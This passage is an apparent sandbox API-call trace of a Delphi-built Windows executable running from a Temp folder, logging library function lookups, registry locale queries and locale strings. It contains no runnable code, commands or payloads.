[0148.937] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0148.937] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0148.937] GetProcAddress (hModule=0x769b0000, lpProcName="UnhandledExceptionFilter") returned 0x769e76f7 [0148.937] GetProcAddress (hModule=0x769b0000, lpProcName="SetFilePointer") returned 0x769c17b1 [0148.937] GetProcAddress (hModule=0x769b0000, lpProcName="SetEndOfFile") returned 0x769dce06 [0148.937] GetProcAddress (hModule=0x769b0000, lpProcName="RtlUnwind") returned 0x769ed1b3 [0148.937] GetProcAddress (hModule=0x769b0000, lpProcName="ReadFile") returned 0x769c3e83 [0148.937] GetProcAddress (hModule=0x769b0000, lpProcName="RaiseException") returned 0x769c585e [0148.937] GetProcAddress (hModule=0x769b0000, lpProcName="GetStdHandle") returned 0x769c516b [0148.937] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileSize") returned 0x769c194e [0148.937] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemTime") returned 0x769c5a4e [0148.937] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileType") returned 0x769c34e1 [0148.937] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0148.938] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0148.938] GetModuleHandleA (lpModuleName="user32.dll") returned 0x773b0000 [0148.938] GetProcAddress (hModule=0x773b0000, lpProcName="GetKeyboardType") returned 0x77409ac4 [0148.938] GetProcAddress (hModule=0x773b0000, lpProcName="LoadStringA") returned 0x773cdb21 [0148.938] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0148.938] GetProcAddress (hModule=0x773b0000, lpProcName="CharNextA") returned 0x773c7a1b [0148.938] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76c20000 [0148.938] GetProcAddress (hModule=0x76c20000, lpProcName="RegQueryValueExA") returned 0x76c348ef [0148.939] GetProcAddress (hModule=0x76c20000, lpProcName="RegOpenKeyExA") returned 0x76c34907 [0148.939] GetProcAddress (hModule=0x76c20000, lpProcName="RegCloseKey") returned 0x76c3469d [0148.939] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x757f0000 [0148.939] GetProcAddress (hModule=0x757f0000, lpProcName="VariantChangeTypeEx") returned 0x757f4c28 [0148.939] GetProcAddress (hModule=0x757f0000, lpProcName="VariantCopyInd") returned 0x7580e86c [0148.939] GetProcAddress (hModule=0x757f0000, lpProcName="VariantClear") returned 0x757f3eae [0148.939] GetProcAddress (hModule=0x757f0000, lpProcName="SysStringLen") returned 0x757f4680 [0148.939] GetProcAddress (hModule=0x757f0000, lpProcName="SysFreeString") returned 0x757f3e59 [0148.939] GetProcAddress (hModule=0x757f0000, lpProcName="SysReAllocStringLen") returned 0x757f7810 [0148.939] GetProcAddress (hModule=0x757f0000, lpProcName="SysAllocStringLen") returned 0x757f45d2 [0148.939] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0148.939] GetProcAddress (hModule=0x769b0000, lpProcName="TlsSetValue") returned 0x769c14db [0148.939] GetProcAddress (hModule=0x769b0000, lpProcName="TlsGetValue") returned 0x769c11e0 [0148.940] GetProcAddress (hModule=0x769b0000, lpProcName="TlsFree") returned 0x769c3537 [0148.940] GetProcAddress (hModule=0x769b0000, lpProcName="TlsAlloc") returned 0x769c4965 [0148.940] GetProcAddress (hModule=0x769b0000, lpProcName="LocalFree") returned 0x769c2cec [0148.940] GetProcAddress (hModule=0x769b0000, lpProcName="LocalAlloc") returned 0x769c166c [0148.940] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0148.940] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76c20000 [0148.940] GetProcAddress (hModule=0x76c20000, lpProcName="RegSetValueExA") returned 0x76c314b3 [0148.940] GetProcAddress (hModule=0x76c20000, lpProcName="RegSetValueA") returned 0x76c80e41 [0148.940] GetProcAddress (hModule=0x76c20000, lpProcName="RegQueryValueExA") returned 0x76c348ef [0148.940] GetProcAddress (hModule=0x76c20000, lpProcName="RegQueryInfoKeyA") returned 0x76c2e143 [0148.940] GetProcAddress (hModule=0x76c20000, lpProcName="RegOpenKeyExA") returned 0x76c34907 [0148.940] GetProcAddress (hModule=0x76c20000, lpProcName="RegEnumKeyExA") returned 0x76c31481 [0148.940] GetProcAddress (hModule=0x76c20000, lpProcName="RegCreateKeyExA") returned 0x76c31469 [0148.940] GetProcAddress (hModule=0x76c20000, lpProcName="RegCloseKey") returned 0x76c3469d [0148.941] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0148.941] GetProcAddress (hModule=0x769b0000, lpProcName="WritePrivateProfileStringA") returned 0x769e7018 [0148.941] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0148.941] GetProcAddress (hModule=0x769b0000, lpProcName="WaitForSingleObject") returned 0x769c1136 [0148.941] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualUnlock") returned 0x769def11 [0148.941] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualQuery") returned 0x769c4412 [0148.941] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualLock") returned 0x769dec0b [0148.941] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0148.941] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0148.941] GetProcAddress (hModule=0x769b0000, lpProcName="Sleep") returned 0x769c10ff [0148.941] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadPriority") returned 0x769c326b [0148.941] GetProcAddress (hModule=0x769b0000, lpProcName="SetFilePointer") returned 0x769c17b1 [0148.941] GetProcAddress (hModule=0x769b0000, lpProcName="SetFileAttributesA") returned 0x769deca3 [0148.941] GetProcAddress (hModule=0x769b0000, lpProcName="SetEndOfFile") returned 0x769dce06 [0148.941] GetProcAddress (hModule=0x769b0000, lpProcName="RemoveDirectoryA") returned 0x76a44a5f [0148.942] GetProcAddress (hModule=0x769b0000, lpProcName="ReadFile") returned 0x769c3e83 [0148.942] GetProcAddress (hModule=0x769b0000, lpProcName="QueryPerformanceFrequency") returned 0x769c41a8 [0148.942] GetProcAddress (hModule=0x769b0000, lpProcName="QueryPerformanceCounter") returned 0x769c1705 [0148.942] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryA") returned 0x769c498f [0148.942] GetProcAddress (hModule=0x769b0000, lpProcName="LeaveCriticalSection") returned 0x77a02270 [0148.942] GetProcAddress (hModule=0x769b0000, lpProcName="IsBadReadPtr") returned 0x769ed065 [0148.942] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSection") returned 0x77a12c42 [0148.942] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalUnlock") returned 0x769dcfb4 [0148.942] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalHandle") returned 0x769ed26c [0148.942] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalLock") returned 0x769dd077 [0148.942] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalFree") returned 0x769c5510 [0148.942] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalAlloc") returned 0x769c5846 [0148.942] GetProcAddress (hModule=0x769b0000, lpProcName="GetWindowsDirectoryA") returned 0x769e2ada [0148.943] GetProcAddress (hModule=0x769b0000, lpProcName="GetVolumeInformationA") returned 0x769e6d9b [0148.943] GetProcAddress (hModule=0x769b0000, lpProcName="GetVersionExA") returned 0x769c34c9 [0148.943] GetProcAddress (hModule=0x769b0000, lpProcName="GetVersion") returned 0x769c441f [0148.943] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadPriority") returned 0x769c4377 [0148.943] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadLocale") returned 0x769c357f [0148.943] GetProcAddress (hModule=0x769b0000, lpProcName="GetTempPathA") returned 0x769e273c [0148.943] GetProcAddress (hModule=0x769b0000, lpProcName="GetTempFileNameA") returned 0x769e9d0f [0148.943] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemInfo") returned 0x769c4982 [0148.943] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0148.943] GetProcAddress (hModule=0x769b0000, lpProcName="GetPrivateProfileStringA") returned 0x769d1804 [0148.943] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0148.943] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0148.943] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoA") returned 0x769dd5b5 [0148.943] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocalTime") returned 0x769c5a5e [0148.944] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0148.944] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileSize") returned 0x769c194e [0148.944] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileAttributesA") returned 0x769c53cc [0148.944] GetProcAddress (hModule=0x769b0000, lpProcName="GetExitCodeProcess") returned 0x769d1705 [0148.944] GetProcAddress (hModule=0x769b0000, lpProcName="GetDriveTypeA") returned 0x769def45 [0148.944] GetProcAddress (hModule=0x769b0000, lpProcName="GetDiskFreeSpaceA") returned 0x76a448df [0148.944] GetProcAddress (hModule=0x769b0000, lpProcName="GetDateFormatA") returned 0x769ea939 [0148.944] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThreadId") returned 0x769c1430 [0148.944] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThread") returned 0x769c17cc [0148.944] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcess") returned 0x769c17e9 [0148.944] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentDirectoryA") returned 0x769ed4e6 [0148.944] GetProcAddress (hModule=0x769b0000, lpProcName="GetCPInfo") returned 0x769c5141 [0148.944] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0148.946] GetProcAddress (hModule=0x769b0000, lpProcName="FormatMessageA") returned 0x769e5f8d [0148.946] GetProcAddress (hModule=0x769b0000, lpProcName="FindNextFileA") returned 0x769ed52e [0148.946] GetProcAddress (hModule=0x769b0000, lpProcName="FindFirstFileA") returned 0x769ce286 [0148.946] GetProcAddress (hModule=0x769b0000, lpProcName="FindClose") returned 0x769c43fa [0148.946] GetProcAddress (hModule=0x769b0000, lpProcName="FileTimeToLocalFileTime") returned 0x769ce256 [0148.946] GetProcAddress (hModule=0x769b0000, lpProcName="FileTimeToDosDateTime") returned 0x769dc845 [0148.946] GetProcAddress (hModule=0x769b0000, lpProcName="ExpandEnvironmentStringsA") returned 0x769deb09 [0148.946] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0148.946] GetProcAddress (hModule=0x769b0000, lpProcName="EnumCalendarInfoA") returned 0x769e9e40 [0148.946] GetProcAddress (hModule=0x769b0000, lpProcName="EnterCriticalSection") returned 0x77a022b0 [0148.946] GetProcAddress (hModule=0x769b0000, lpProcName="DeviceIoControl") returned 0x769c31df [0148.947] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteFileA") returned 0x769c53fc [0148.947] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteCriticalSection") returned 0x77a145f5 [0148.947] GetProcAddress (hModule=0x769b0000, lpProcName="CreateProcessA") returned 0x769c1072 [0148.947] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0148.947] GetProcAddress (hModule=0x769b0000, lpProcName="CreateEventA") returned 0x769c323c [0148.947] GetProcAddress (hModule=0x769b0000, lpProcName="CreateDirectoryA") returned 0x769ed516 [0148.947] GetProcAddress (hModule=0x769b0000, lpProcName="CopyFileA") returned 0x769e58b5 [0148.947] GetProcAddress (hModule=0x769b0000, lpProcName="CompareStringA") returned 0x769c3c0a [0148.947] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0148.947] GetModuleHandleA (lpModuleName="version.dll") returned 0x0 [0148.947] LoadLibraryA (lpLibFileName="version.dll") returned 0x74520000 [0149.156] GetProcAddress (hModule=0x74520000, lpProcName="VerQueryValueA") returned 0x74521b72 [0149.156] GetProcAddress (hModule=0x74520000, lpProcName="GetFileVersionInfoSizeA") returned 0x74521c9c [0149.156] GetProcAddress (hModule=0x74520000, lpProcName="GetFileVersionInfoA") returned 0x74521ced [0149.156] GetModuleHandleA (lpModuleName="gdi32.dll") returned 0x77240000 [0149.156] GetProcAddress (hModule=0x77240000, lpProcName="SetBkMode") returned 0x772551a2 [0149.156] GetProcAddress (hModule=0x77240000, lpProcName="GetStockObject") returned 0x77254eb8 [0149.156] GetProcAddress (hModule=0x77240000, lpProcName="CreateFontA") returned 0x7725d0e8 [0149.156] GetProcAddress (hModule=0x77240000, lpProcName="CreateDIBitmap") returned 0x77257217 [0149.156] GetModuleHandleA (lpModuleName="user32.dll") returned 0x773b0000 [0149.157] GetProcAddress (hModule=0x773b0000, lpProcName="TranslateMessage") returned 0x773c7809 [0149.157] GetProcAddress (hModule=0x773b0000, lpProcName="ShowWindow") returned 0x773d0dfb [0149.157] GetProcAddress (hModule=0x773b0000, lpProcName="SetWindowTextA") returned 0x773d7aee [0149.157] GetProcAddress (hModule=0x773b0000, lpProcName="SetWindowPos") returned 0x773c8e4e [0149.157] GetProcAddress (hModule=0x773b0000, lpProcName="SetFocus") returned 0x773d2175 [0149.157] GetProcAddress (hModule=0x773b0000, lpProcName="SetDlgItemTextA") returned 0x773dc4d6 [0149.157] GetProcAddress (hModule=0x773b0000, lpProcName="SetClipboardData") returned 0x77408e57 [0149.157] GetProcAddress (hModule=0x773b0000, lpProcName="SendMessageA") returned 0x773d612e [0149.157] GetProcAddress (hModule=0x773b0000, lpProcName="SendDlgItemMessageA") returned 0x773ec112 [0149.157] GetProcAddress (hModule=0x773b0000, lpProcName="RegisterClassA") returned 0x773d434b [0149.157] GetProcAddress (hModule=0x773b0000, lpProcName="PostQuitMessage") returned 0x773c9abb [0149.157] GetProcAddress (hModule=0x773b0000, lpProcName="PeekMessageA") returned 0x773d5f74 [0149.157] GetProcAddress (hModule=0x773b0000, lpProcName="OpenClipboard") returned 0x773d8ecb [0149.158] GetProcAddress (hModule=0x773b0000, lpProcName="MsgWaitForMultipleObjects") returned 0x773d0b4a [0149.158] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0149.158] GetProcAddress (hModule=0x773b0000, lpProcName="LoadStringA") returned 0x773cdb21 [0149.158] GetProcAddress (hModule=0x773b0000, lpProcName="LoadIconA") returned 0x773cdafb [0149.158] GetProcAddress (hModule=0x773b0000, lpProcName="LoadCursorA") returned 0x773cdad5 [0149.158] GetProcAddress (hModule=0x773b0000, lpProcName="IsClipboardFormatAvailable") returned 0x773d8676 [0149.158] GetProcAddress (hModule=0x773b0000, lpProcName="GetWindowTextA") returned 0x773d0029 [0149.158] GetProcAddress (hModule=0x773b0000, lpProcName="GetWindowRect") returned 0x773c7f34 [0149.158] GetProcAddress (hModule=0x773b0000, lpProcName="GetSystemMetrics") returned 0x773c7d2f [0149.158] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageA") returned 0x773c7bd3 [0149.158] GetProcAddress (hModule=0x773b0000, lpProcName="GetFocus") returned 0x773d0dee [0149.158] GetProcAddress (hModule=0x773b0000, lpProcName="GetDlgItemTextA") returned 0x77426b36 [0149.158] GetProcAddress (hModule=0x773b0000, lpProcName="GetDlgItem") returned 0x773ef1ba [0149.159] GetProcAddress (hModule=0x773b0000, lpProcName="GetDesktopWindow") returned 0x773d0a19 [0149.159] GetProcAddress (hModule=0x773b0000, lpProcName="GetDC") returned 0x773c72c4 [0149.159] GetProcAddress (hModule=0x773b0000, lpProcName="GetAsyncKeyState") returned 0x773eeb96 [0149.159] GetProcAddress (hModule=0x773b0000, lpProcName="GetActiveWindow") returned 0x773ef5c7 [0149.159] GetProcAddress (hModule=0x773b0000, lpProcName="EndDialog") returned 0x773eb99c [0149.159] GetProcAddress (hModule=0x773b0000, lpProcName="EnableWindow") returned 0x773d2da4 [0149.159] GetProcAddress (hModule=0x773b0000, lpProcName="EmptyClipboard") returned 0x77427cb9 [0149.159] GetProcAddress (hModule=0x773b0000, lpProcName="DispatchMessageA") returned 0x773c7bbb [0149.159] GetProcAddress (hModule=0x773b0000, lpProcName="DialogBoxIndirectParamA") returned 0x7740ce64 [0149.159] GetProcAddress (hModule=0x773b0000, lpProcName="DestroyWindow") returned 0x773c9a55 [0149.159] GetProcAddress (hModule=0x773b0000, lpProcName="DefWindowProcA") returned 0x77a224e0 [0149.159] GetProcAddress (hModule=0x773b0000, lpProcName="CreateWindowExA") returned 0x773cd22e [0149.159] GetProcAddress (hModule=0x773b0000, lpProcName="CloseClipboard") returned 0x773d8e8d [0149.160] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76e80000 [0149.160] GetProcAddress (hModule=0x76e80000, lpProcName="CoCreateGuid") returned 0x76ec15d5 [0149.160] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0149.160] GetProcAddress (hModule=0x769b0000, lpProcName="GetVersionExA") returned 0x769c34c9 [0149.160] GetModuleHandleA (lpModuleName="wsock32.dll") returned 0x0 [0149.160] LoadLibraryA (lpLibFileName="wsock32.dll") returned 0x75400000 [0150.372] GetProcAddress (hModule=0x75400000, lpProcName="ioctlsocket") returned 0x75613084 [0150.372] GetProcAddress (hModule=0x75400000, lpProcName="WSACancelBlockingCall") returned 0x75625343 [0150.372] GetProcAddress (hModule=0x75400000, lpProcName="WSAIsBlocking") returned 0x756253be [0150.372] GetProcAddress (hModule=0x75400000, lpProcName="gethostbyname") returned 0x75627673 [0150.372] GetProcAddress (hModule=0x75400000, lpProcName="send") returned 0x75616f01 [0150.372] GetProcAddress (hModule=0x75400000, lpProcName="recv") returned 0x754017a8 [0150.372] GetProcAddress (hModule=0x75400000, lpProcName="connect") returned 0x75616bdd [0150.373] GetProcAddress (hModule=0x75400000, lpProcName="WSACleanup") returned 0x75613c5f [0150.373] GetProcAddress (hModule=0x75400000, lpProcName="closesocket") returned 0x75613918 [0150.373] GetProcAddress (hModule=0x75400000, lpProcName="shutdown") returned 0x7561449d [0150.373] GetProcAddress (hModule=0x75400000, lpProcName="socket") returned 0x75613eb8 [0150.373] GetProcAddress (hModule=0x75400000, lpProcName="WSAStartup") returned 0x75613ab2 [0150.386] GetModuleFileNameA (in: hModule=0x2120000, lpFilename=0x18fde8, nSize=0x105 | out: lpFilename="\n" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\\n")) returned 0x0 [0150.392] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18fcc3, nSize=0x105 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\52b4.exe")) returned 0x2d [0150.392] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18fdd8 | out: phkResult=0x18fdd8*=0x0) returned 0x2 [0150.393] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18fdd8 | out: phkResult=0x18fdd8*=0x0) returned 0x2 [0150.393] lstrcpyA (in: lpString1=0x18fcc3, lpString2="\n" | out: lpString1="\n") returned="\n" [0150.393] GetThreadLocale () returned 0x409 [0150.393] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18fdd3, cchData=5 | out: lpLCData="ENU") returned 4 [0150.397] lstrlenA (lpString="\n") returned 1 [0150.405] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x244358 [0150.411] GetKeyboardType (nTypeFlag=0) returned 4 [0150.411] GetCommandLineA () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe" [0150.411] GetStartupInfoA (in: lpStartupInfo=0x18fe78 | out: lpStartupInfo=0x18fe78*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0150.415] GetCurrentThreadId () returned 0xef0 [0150.421] LoadStringA (in: hInstance=0x2120000, uID=0xffdc, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.421] LoadStringA (in: hInstance=0x2120000, uID=0xffdb, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffd9, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffda, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffd8, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffd7, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffd6, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffd3, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffd2, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffd1, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffea, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffeb, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffec, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffe9, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffe8, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffe6, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffe5, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffe4, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffe3, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffe2, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffe1, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffe0, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xffff, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xfffe, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xfffd, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xfffc, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xfffb, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xfffa, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.422] LoadStringA (in: hInstance=0x2120000, uID=0xfff9, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.429] LoadStringA (in: hInstance=0x2120000, uID=0xfff7, lpBuffer=0x18fa9c, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.429] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x244aa8 [0150.429] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2180000 [0150.429] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x245aa8 [0150.430] VirtualAlloc (lpAddress=0x2180000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2180000 [0150.430] LoadStringA (in: hInstance=0x2120000, uID=0xffe7, lpBuffer=0x18fa9c, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0150.436] GetThreadLocale () returned 0x409 [0150.436] GetSystemMetrics (nIndex=74) returned 0 [0150.446] GetSystemMetrics (nIndex=42) returned 0 [0150.452] GetThreadLocale () returned 0x409 [0150.452] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Jan") returned 4 [0150.452] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd04, cchData=256 | out: lpLCData="January") returned 8 [0150.452] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Feb") returned 4 [0150.452] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd04, cchData=256 | out: lpLCData="February") returned 9 [0150.452] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Mar") returned 4 [0150.452] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd04, cchData=256 | out: lpLCData="March") returned 6 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Apr") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd04, cchData=256 | out: lpLCData="April") returned 6 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd04, cchData=256 | out: lpLCData="May") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd04, cchData=256 | out: lpLCData="May") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Jun") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd04, cchData=256 | out: lpLCData="June") returned 5 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Jul") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd04, cchData=256 | out: lpLCData="July") returned 5 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Aug") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd04, cchData=256 | out: lpLCData="August") returned 7 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sep") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd04, cchData=256 | out: lpLCData="September") returned 10 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Oct") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd04, cchData=256 | out: lpLCData="October") returned 8 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Nov") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd04, cchData=256 | out: lpLCData="November") returned 9 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Dec") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd04, cchData=256 | out: lpLCData="December") returned 9 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sun") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, 